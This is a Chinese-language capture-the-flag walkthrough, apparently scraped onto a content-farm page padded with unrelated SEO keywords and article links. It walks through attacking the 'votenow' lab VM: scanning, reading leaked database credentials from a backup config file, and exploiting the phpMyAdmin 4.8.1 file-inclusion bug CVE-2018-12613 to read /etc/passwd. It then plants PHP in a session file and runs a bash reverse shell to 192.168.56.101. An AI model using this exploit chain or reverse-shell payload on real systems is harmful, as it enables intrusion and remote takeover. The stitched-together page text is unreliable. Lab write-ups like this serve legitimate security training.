当前位置: 首页 > news >正文

网站新闻源码网站开发技术难度

网站新闻源码,网站开发技术难度,中卫平面磨床招聘,重庆游戏公司一、靶场搭建 二、信息收集 fping -gaq 192.168.56.0/24 登录进入是这个页面 whatweb http://192.168.56.119 dirsearch -u http://192.168.56.119/ curl http://192.168.56.119/config.php.bak,发现数据库用户名、密码等重要信息 端口扫描:nmap -sV…

一、靶场搭建

二、信息收集

fping -gaq 192.168.56.0/24

登录进入是这个页面

 whatweb http://192.168.56.119 

dirsearch -u http://192.168.56.119/ 

curl http://192.168.56.119/config.php.bak,发现数据库用户名、密码等重要信息


端口扫描:nmap -sV -p- 192.168.56.119

发现扫出来没太多有用信息,但是在首页中存在contact@votenow.local

修改 /etc/hosts

echo "192.168.56.119 votenow.local" | sudo tee -a /etc/hosts

发现可以访问了

通过目录扫描发现未有任何其他重要信息,尝试对其进行子域名爆破,发现了datasafe.votenow.local域名,将其添加到/etc/hosts中进行访问,发现该域名为phpmyadmin

利用之前收集到的数据库信息尝试登录

$dbUser = "votebox";
$dbPass = "casoj3FFASPsbyoRP";
$dbHost = "localhost";
$dbname = "votebox";

登录成功

三、查找漏洞

扫描phpmyadmin版本信息

whatweb http://datasafe.votenow.local 

发现版本为phpMyAdmin 4.8.1,可能存在CVE-2018-12613漏洞

四、漏洞利用

利用CVE-2018-12613漏洞,构造payload可以读取任意文件http://datasafe.votenow.local/index.php?target=db_sql.php%253f/../../../../../../../etc/passwd

在SQL窗口运行select @@datadir,查看路径/var/lib/mysql/

再输入select  '<?php phpinfo();?>'

打开F12 ,查看返回值:nm04sns8mo5a0i8fic2grtcqu29ue7c2

http://datasafe.votenow.local/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/session/sess_nm04sns8mo5a0i8fic2grtcqu29ue7c2

开启监听端口,在SQL中写入:select '<?php system("bash -i >& /dev/tcp/192.168.56.101/1298 0>&1");exit;?>' 

再去跟上面的步骤访问该文件,开启监听,成功连接

http://www.dtcms.com/a/466502.html

相关文章:

  • 湘潭网站建设多少钱jsp 响应式网站模板
  • PCB设计流程
  • 如何做展示型网站优秀的网站通过什么提供信息
  • 租车公司网站 模板腾讯网站建设专家
  • wordpress 是CMS自己做的网站竞价优化
  • UE5 测量 -2,长度测量:P5绘制定位点之间的连线,P6增加 UI控件,显示距离数据;P7第一个点不显示距离
  • AI操作系统 | LLMs RAG DRAG
  • Python全栈(基础篇)——每日一练详解(day02~day05)
  • SpringBoot中使用Redis(引入案例)
  • 舟山外贸建站公司多梦wordpress
  • Mybatis初始
  • 多模态 AI 与金融数据融合架构研究报告
  • 工作室网站免费建设北京网站改版有什么用
  • 哪家公司做网站企业网站客户案例
  • 网站制定报告长官夫人在捉鬼
  • 东莞网站开发培训哪里有微信朋友圈营销方案
  • 大疆无人机 + ai识别
  • openMVG_main_SfMInit_ImageListing
  • 无人机图传系统的功能解析与技术实现,无人机图像传输技术
  • 网站如何做外链2018桂林人论坛怎么注册
  • 邯郸wap网站制作4399曾经很火的网页游戏
  • 基于MATLAB的卫星导航解算系统实现
  • docker网络
  • 网站导航做多大合肥哪家做网站好
  • system表空间丢失部分文件恢复---惜分飞
  • 网站备案的好处有哪些网站优化软件哪个好
  • 计网学习01-概论
  • 如何利用强化学习技术提高智能聊天功能的准确性?
  • 上海wordpress建站广东富盈建设有限公司企业网站
  • 【xx】PCIe协议之Margning篇之 Pipe Spec 之 典型 magining sequence